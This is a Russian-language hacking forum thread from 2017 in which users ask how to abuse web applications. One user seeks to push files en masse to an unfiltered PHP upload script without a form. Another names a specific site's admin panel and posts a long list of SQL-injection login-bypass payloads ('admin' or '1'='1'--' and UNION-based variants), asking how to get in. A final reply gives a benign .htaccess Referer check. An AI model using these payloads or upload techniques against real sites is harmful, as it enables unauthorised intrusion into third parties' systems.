ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

28.11.2017, 12:26
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от MyNameIsWhoIsWho
MyNameIsWhoIsWho said:
↑
Ребят подскажите, нашел файл аплоад, но хз как отправить файл пост запросом)
Хтмл формы для заливки нет.
Как мне вообще создать запрос на отправку файла? И чем его отправить?
Знаю что тупой вопрос, но почему то всегда игнорировал эту тему а теперь пришлось столкнуться
Или ткните носом в инфу, полистал форум с гуглом, что-то не нашел
Плагином для лисы
|
|
|

28.11.2017, 12:31
|
|
Guest
Сообщений: n/a
Провел на форуме: 1219
Репутация:
0
|
|
Сообщение от BabaDook
BabaDook said:
↑
Вы уверены что файл рабочий, в крации вам нужен параметр, его можно прочитать, или угадать, ткните пальцем в небо и быть может вы попадёте в звезду зелёного цвета. Надеюсь я достаточно ясно объяснил на сколько это реально сделать
Ничего не понял.
Есть пхп скрипт, где загрузка файла не фильтруется. Параметр для пост запроса я знаю, просто пост запрос знаю как отправлять, но не знаю как отправлять файл пост запросом скрипту без хтмл формы
|
|
|
|

28.11.2017, 14:12
|
|
Guest
Сообщений: n/a
Провел на форуме: 2312
Репутация:
0
|
|
Сообщение от MyNameIsWhoIsWho
MyNameIsWhoIsWho said:
↑
Ничего не понял.
Есть пхп скрипт, где загрузка файла не фильтруется. Параметр для пост запроса я знаю, просто пост запрос знаю как отправлять, но не знаю как отправлять файл пост запросом скрипту без хтмл формы
Создаёшь файл на рабочем столе index.html
Открываешь файл и пишешь:
Затем открываешь index.html в браузере
|
|
|
|

29.11.2017, 01:57
|
|
Guest
Сообщений: n/a
Провел на форуме: 4684
Репутация:
0
|
|
Сообщение от MotherHacker
MotherHacker said:
↑
Создаёшь файл на рабочем столе index.html
Открываешь файл и пишешь:
Затем открываешь index.html в браузере
http://htmlbook.ru/html/form/enctype
|
|
|
|

29.11.2017, 07:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 1219
Репутация:
0
|
|
Я вкурсе, спасибо)
Мне надо это было под массы заточить и отследить сам запрос, а не по одному ручками сидеть отправлять)
Другой вопрос. Вот это добро можно как то привести в человеческий вид? Чтоб код читабельный был.
http://clip2net.com/s/3PSUKqs
|
|
|
|

29.11.2017, 12:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 2312
Репутация:
0
|
|
|
|
|
|

29.11.2017, 23:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Вась. Я тебя не понимаю, у тебя вопросы вообще адовые. Тебя так не помогут
|
|
|
|

02.12.2017, 17:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
Можно сделать проверку Referer через .htaccess дабы получить защиту от CSRF ?
|
|
|
|

02.12.2017, 20:06
|
|
Guest
Сообщений: n/a
Провел на форуме: 54593
Репутация:
0
|
|
Вот таой замечательный сайт
.SpoilerTarget" type="button">Spoiler: 1
cyber-cafe.ru/admin/
вбить admin: admin - и тебе скажет, что нет логина и пароля. Есть вбить комбинации в сплойлере - выходит ошибка синтакс еррор. Вопрос к знатокам: действительно ли не получится авторизоваться, или нужен другой вектор?
Или иногда ошибка бывает простой ошибкой без возможности авторизации?
.SpoilerTarget" type="button">Spoiler: 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
|
|

02.12.2017, 20:15
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
Сообщение от Octavian
Octavian said:
↑
Можно сделать проверку Referer через .htaccess дабы получить защиту от CSRF ?
Код:
Code:
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?site.com/.*
RewriteRule .* - [F]
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|